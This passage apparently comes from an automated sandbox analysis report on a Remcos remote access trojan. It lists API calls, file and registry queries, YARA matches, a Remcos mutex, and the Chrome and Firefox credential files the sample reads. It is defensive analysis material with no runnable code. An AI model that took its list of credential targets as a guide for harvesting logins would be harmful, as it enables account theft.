                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoW,27_2_00452313
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: EnumSystemLocalesW,27_2_00448404
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,27_2_0045243C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoW,27_2_00452543
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,27_2_00452610
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoA,27_2_0040F8D1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: GetLocaleInfoW,27_2_004488ED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,27_2_00451CD8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: EnumSystemLocalesW,27_2_00451F50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: EnumSystemLocalesW,27_2_00451F9B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040B164 GetLocalTime,wsprintfW,27_2_0040B164
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041B60D GetUserNameW,27_2_0041B60D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004493AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,27_2_004493AD
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.3325855778.0000000002DEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000001B.00000002.2023426786.0000000000967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2124, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6852, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 27_2_0040BA12
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 27_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: \key3.db | 27_2_0040BB30

                        Remote Access Functionality

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3PWW8O
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3PWW8O
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3PWW8O
                        Source: Yara match | File source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE
